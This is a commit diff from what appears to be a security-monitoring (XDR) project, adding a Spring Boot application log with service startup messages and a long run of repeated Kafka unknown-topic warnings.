1、新增功能探针联动处置、心跳在线检测
2、syslog-consumer模块拆分 syslog-consumer-rule模块实现日志数据消费、解析、泛化入库。
This commit is contained in:
@@ -0,0 +1,251 @@
|
||||
2026-05-19 11:53:04.687 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
|
||||
2026-05-19 11:53:04.687 [main] INFO com.syslogRuleApplication - Starting syslogRuleApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 22112 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer-rule\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
|
||||
2026-05-19 11:53:04.724 [main] INFO com.syslogRuleApplication - No active profile set, falling back to 1 default profile: "default"
|
||||
2026-05-19 11:53:07.286 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 11:53:07.288 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
|
||||
2026-05-19 11:53:07.872 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 578 ms. Found 1 Elasticsearch repository interfaces.
|
||||
2026-05-19 11:53:07.878 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 11:53:07.879 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
|
||||
2026-05-19 11:53:07.983 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
|
||||
2026-05-19 11:53:07.983 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 103 ms. Found 0 Reactive Elasticsearch repository interfaces.
|
||||
2026-05-19 11:53:07.994 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 11:53:07.995 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
|
||||
2026-05-19 11:53:08.138 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
|
||||
2026-05-19 11:53:08.139 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 137 ms. Found 0 Redis repository interfaces.
|
||||
2026-05-19 11:53:08.884 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8289 (http)
|
||||
2026-05-19 11:53:08.893 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8289"]
|
||||
2026-05-19 11:53:08.894 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
|
||||
2026-05-19 11:53:08.894 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
|
||||
2026-05-19 11:53:09.084 [main] INFO o.a.c.c.C.[.[localhost].[/xdrrule] - Initializing Spring embedded WebApplicationContext
|
||||
2026-05-19 11:53:09.085 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 4203 ms
|
||||
2026-05-19 11:53:09.143 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogRuleApplication.dmColumnService
|
||||
2026-05-19 11:53:11.848 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
|
||||
2026-05-19 11:53:12.270 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
|
||||
2026-05-19 11:53:12.284 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
|
||||
2026-05-19 11:53:12.302 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
|
||||
2026-05-19 11:53:12.305 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
|
||||
2026-05-19 11:53:12.364 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
|
||||
2026-05-19 11:53:18.245 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
|
||||
2026-05-19 11:53:18.977 [main] INFO com.common.util.MyBatisUtil - MyBatis 初始化成功
|
||||
2026-05-19 11:53:19.627 [main] INFO org.quartz.impl.StdSchedulerFactory - Using default implementation for ThreadExecutor
|
||||
2026-05-19 11:53:19.636 [main] INFO o.quartz.core.SchedulerSignalerImpl - Initialized Scheduler Signaller of type: class org.quartz.core.SchedulerSignalerImpl
|
||||
2026-05-19 11:53:19.637 [main] INFO org.quartz.core.QuartzScheduler - Quartz Scheduler v.2.3.2 created.
|
||||
2026-05-19 11:53:19.637 [main] INFO org.quartz.simpl.RAMJobStore - RAMJobStore initialized.
|
||||
2026-05-19 11:53:19.638 [main] INFO org.quartz.core.QuartzScheduler - Scheduler meta-data: Quartz Scheduler (v2.3.2) 'quartzScheduler' with instanceId 'NON_CLUSTERED'
|
||||
Scheduler class: 'org.quartz.core.QuartzScheduler' - running locally.
|
||||
NOT STARTED.
|
||||
Currently in standby mode.
|
||||
Number of jobs executed: 0
|
||||
Using thread pool 'org.quartz.simpl.SimpleThreadPool' - with 10 threads.
|
||||
Using job-store 'org.quartz.simpl.RAMJobStore' - which does not support persistence. and is not clustered.
|
||||
|
||||
2026-05-19 11:53:19.638 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler 'quartzScheduler' initialized from an externally provided properties instance.
|
||||
2026-05-19 11:53:19.638 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler version: 2.3.2
|
||||
2026-05-19 11:53:19.638 [main] INFO org.quartz.core.QuartzScheduler - JobFactory set to: org.springframework.scheduling.quartz.SpringBeanJobFactory@3b68a50c
|
||||
2026-05-19 11:53:19.847 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
|
||||
2026-05-19 11:53:19.847 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
|
||||
2026-05-19 11:53:19.847 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779162799845
|
||||
2026-05-19 11:53:19.873 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
|
||||
2026-05-19 11:53:19.873 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
|
||||
2026-05-19 11:53:19.873 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779162799873
|
||||
2026-05-19 11:53:19.875 [main] INFO o.a.coyote.http11.Http11NioProtocol - Starting ProtocolHandler ["http-nio-8289"]
|
||||
2026-05-19 11:53:19.892 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat started on port(s): 8289 (http) with context path '/xdrrule'
|
||||
2026-05-19 11:53:19.892 [main] INFO o.s.s.quartz.SchedulerFactoryBean - Starting Quartz Scheduler now
|
||||
2026-05-19 11:53:19.893 [main] INFO org.quartz.core.QuartzScheduler - Scheduler quartzScheduler_$_NON_CLUSTERED started.
|
||||
2026-05-19 11:53:19.911 [main] INFO com.syslogRuleApplication - Started syslogRuleApplication in 16.279 seconds (JVM running for 21.466)
|
||||
2026-05-19 11:53:20.209 [org.springframework.kafka.KafkaListenerEndpointContainer#0-1-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - agent-syslog-group: partitions assigned: []
|
||||
2026-05-19 11:53:20.276 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - agent-syslog-group: partitions assigned: [agent-syslog-topic-0]
|
||||
2026-05-19 12:38:15.007 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.014 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.apache.kafka.clients.NetworkClient - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Error while fetching metadata with correlation id 2912 : {agent-syslog-topic=LEADER_NOT_AVAILABLE}
|
||||
2026-05-19 12:38:15.015 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.019 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.021 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.022 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.024 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.025 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.028 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.030 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.035 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.040 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.044 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.047 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.050 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.051 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.055 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.057 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.060 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.065 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.068 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.071 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.073 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.075 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.080 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.082 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.083 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.085 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.086 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.088 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.089 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.090 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.092 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.096 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.100 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.101 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.103 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.105 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.107 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.109 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.110 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.112 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.114 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.136 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.apache.kafka.clients.NetworkClient - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Error while fetching metadata with correlation id 2954 : {agent-syslog-topic=LEADER_NOT_AVAILABLE}
|
||||
2026-05-19 12:38:15.136 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.147 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.157 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.162 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.165 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.168 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.169 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.172 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.176 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.178 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.179 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.181 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.183 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.185 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.189 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.191 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.194 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.196 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.198 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.200 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.205 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.207 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.208 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:38:15.211 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] WARN o.a.k.c.consumer.internals.Fetcher - [Consumer clientId=consumer-agent-syslog-group-1, groupId=agent-syslog-group] Received unknown topic or partition error in fetch for partition agent-syslog-topic-0
|
||||
2026-05-19 12:40:49.569 [main] INFO com.syslogRuleApplication - Starting syslogRuleApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 30764 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer-rule\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
|
||||
2026-05-19 12:40:49.570 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
|
||||
2026-05-19 12:40:49.574 [main] INFO com.syslogRuleApplication - No active profile set, falling back to 1 default profile: "default"
|
||||
2026-05-19 12:40:51.867 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
|
||||
2026-05-19 12:40:51.869 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
|
||||
